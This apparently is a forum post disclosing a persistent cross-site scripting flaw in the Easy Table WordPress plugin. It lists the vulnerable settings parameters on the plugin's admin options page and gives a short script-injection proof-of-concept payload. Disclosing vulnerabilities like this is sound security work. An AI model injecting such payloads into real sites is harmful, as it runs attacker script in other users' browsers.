Persistent Cross-Site Scripting
-
III. DESCRIPTION
————————-
Has been detected a Persistent XSS vulnerability in Easy Table, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user’s browser.IV. PROOF OF CONCEPT
————————-
Malicious Request:
/wordpress/wp-admin/options-general.php?page=easy-tableeasy_table_plugin_option[shortcodetag]
easy_table_plugin_option[attrtag]
easy_table_plugin_option[class]
easy_table_plugin_option[width]
easy_table_plugin_option[border]
easy_table_plugin_option[align]
easy_table_plugin_option[limit]
easy_table_plugin_option[nl]
easy_table_plugin_option[terminator]
easy_table_plugin_option[delimiter]
easy_table_plugin_option[escape]In all of this parameters an attacker can inject for example “><script>alert(1)</script> to perform a attack of Persistent Cross-Site Scripting.
- The topic ‘Persistent Cross-Site Scripting’ is closed to new replies.